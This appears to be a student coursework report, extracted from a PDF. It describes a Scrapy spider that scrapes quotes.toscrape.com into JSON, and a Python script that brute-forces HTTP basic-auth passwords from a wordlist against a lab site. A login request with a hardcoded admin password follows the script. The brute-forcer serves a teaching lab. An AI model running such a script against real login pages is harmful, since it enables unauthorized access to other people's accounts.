You are on page 1of 15

Day-Month

2019

Quotes

Student names:

HIGHER COLLEGES OF TECHNOLOGY


Quotes

Table of Contents

1. INTRODUCTION: 2

1.1. OBJECTIVES IF PROJECTS 2

1.2. DELIVERABLES 2

2. DESIGN A SCRAPER TO SCRAPE INFORMATION FROM A WEBSITE 2

2.1. CODING A SCRAPER 3

2.2. TESTING A SCRAPER 3

3. DESIGN A FORMATTER TO FORMAT OUTPUT DATA IN CSV FILE 5

3.1. CODING A FORMATTER 5

3.2. TESTING A FORMATTER 9

4. DESIGN A CRACKER TO CRACK A PASSWORD 10

4.1. CODING TO GENERATE THE COMBINATION OF PASSWORD 13

4.2. TESTING PASSWORD GENERATION 15

4.3. CODING TO CLASSIFY THE GENERATED PASSWORDS 15

4.4. TESTING PASSWORD CLASSIFICATION 16

5. REFLECTION 17

5.1. WRITE THE REFLECTION OF STUDENT1 17

5.2. WRITE THE REFLECTION OF STUDENT2 17

5.3. WRITE THE REFLECTION OF STUDENT3 17

6. REFERENCE PAGE 18

CSF 2113 201910 1


Quotes

1. Introduction:
In our first year in HCT we mainly focused on hardware and software now we are in the
fourth semester and we are tacking programming of information security.
Our project is mainly about using atom with the help of the websites to scrap different
types of information using scrapy functions and it will provide a good interface that can
be shown on the command prompt.
And we are going to use Linux ubuntu to extract information or anything useful to
complete this project, we will start by extracting useful information from website and
end it up with encrypting passwords.

1.1. Objectives if Projects

In our project there are many objectives, and we are working on achieving our
objectives such as scraping information using several codes that will be used and
return from the chosen website of our project, we are looking also forward to flack,
generate and extract passwords, we are going to achieve this by (anaconda prompt)
and (atom) and our website and by searching in internet. Special functions well be
used and search on the internet might include codes with different level of
complexity to demonstrate our understanding to achieve our project.
Finally, our approach is to preform successful functional program that is clear and
easy to figure and penetrate.

1.2. Deliverables

At the first we are expecting to create and get a lot of outputs from the functions
that we will use from scraping and passwords cracking with pictures to ensure that
the codes are working properly and to prove that it is our work,
1. reports
2. pictures
3. notepads with codes

2. Design a scraper to scrape information from a website

Scraper is a way to get information from websites by inspecting the things we need to
scrape or get from the website, then we will copy the code and then we save the code in
a file so the scraper command can read the code and scrape the information.

CSF 2113 201910 2


Quotes

2.1. Coding a scraper

from scrapy.spiders import BaseSpider


from scrapy.selector import Selector
from scrapy.http import Request

class MySpider(BaseSpider):
name = "quotes"
allowed_domains = ['quotes.toscrape.com']
start_urls = ["http://quotes.toscrape.com/"]

def parse(self, response):


hxs = Selector(response)

#CODE for scraping book titles


quote =
hxs.xpath("//div[@class='quote']/span[@class='text']/text()").extract()
print (quote)
for title in quote:
print (title)

2.2. Testing a scraper

CSF 2113 201910 3


Quotes

3. Design a formatter to format output data in JSON file

A formatter is a command used to transfer the specified things we scraped from the
atom to a JSON file, this will complete our objective which is displaying the information
we scraped.

First, we created an new folder called project2 Then we created a folder inside spider
called alo.py and we used the same code that we used for data scraping, but we added
more codes and also we removed some codes, we put hashtag on the codes that we
don’t want.

Then we went to the …. and we used a json code to save what we craped in json file
called thyab.json

All the codes and pictures are in part 3.1

CSF 2113 201910 4


Quotes

3.1. Coding a formatter

from scrapy.spiders import BaseSpider


from scrapy.selector import Selector
from scrapy.http import Request

class MySpider(BaseSpider):
name = "quotes"
allowed_domains = ['quotes.toscrape.com']
start_urls = ["http://quotes.toscrape.com/"]

def parse(self, response):


hxs = Selector(response)

#CODE for scraping book titles


quote =
hxs.xpath("//div[@class='quote']/span[@class='text']/text()").extract()
print (quote)
for title in quote:
print (title)

CSF 2113 201910 5


Quotes

scrapy crawl quotes2 -o thyab.json -t json

CSF 2113 201910 6


Quotes

3.2. Testing a formatter

CSF 2113 201910 7


Quotes

4. Design a cracker to crack a password

We are going to make a cracker which we are going to use to do a few things like
generating a password and selects the appropriate password to use for the log in, we are
going to use scrappy bank website because it’s not illegal to do for any other websites
and we are doing it for testing purpose.

1) First, we Checked the authentication method

CSF 2113 201910 8


Quotes

CSF 2113 201910 9


Quotes

CSF 2113 201910 10


Quotes

4.1. Coding to generate the combination of password

import requests

import sys

def banner():

print "\n***************************************"

print "* Basic Password bruteforcer 0.1*"

print "***************************************"

def usage():

print "Usage:"

print "python bruteforcing-1.1.py targetsite username passwords_file\n"

print "example: python bruteforcing-1.1.py http://127.0.0.1/Admin admin pass.txt\n"

if __name__ == "__main__":

banner()

if len(sys.argv) != 4:

usage()

sys.exit()

args = sys.argv

#print args

url=args[1]

CSF 2113 201910 11


Quotes

username=args[2]

pwd_file=args[3]

try:

f = open(pwd_file, "r")

passwords = f.readlines()

except:

print ("Failed opening file: ")

print (str(dict_f)+"\n")

sys.exit()

for p in passwords:

#print p

pwd = p.split("\n")[0]

#print (pwd + " " + url)

r = requests.get(url, auth=(username, pwd))

code = r.status_code

if code == 200:

print "[+] Password found - " + pwd + " - !!!"

sys.exit()

else:

#print "Not valid " + pwd

pass

print "Password not found !!!"

CSF 2113 201910 12


Quotes

4.2. Testing password generation

To extract the admin password, we used this code which we learned in one of our
labs called brute forcing, which fetches the correct password of the account from a
file that has around 600 different passwords with different difficulties and prints it
clearly and accurately, we used our codes on a website called scruffybank.com and
here is our result.

4.3. Coding to classify the generated passwords

import requests
payload={'username':'admin', 'password':'administrator123'}
r = requests.post('http://127.0.0.1/check_login.php', data=payload)
print (r.url)
if r.history != []:
first = r.history[0]
code = str(first.status_code)
else:
code = str(r.status_code)
chars = str(len(r.content))

CSF 2113 201910 13


Quotes

print ("Page Output:\t" + chars)


print ('Status code:' + '\t[-]' + code + '\n')

4.4. Testing password classification

CSF 2113 201910 14

You might also like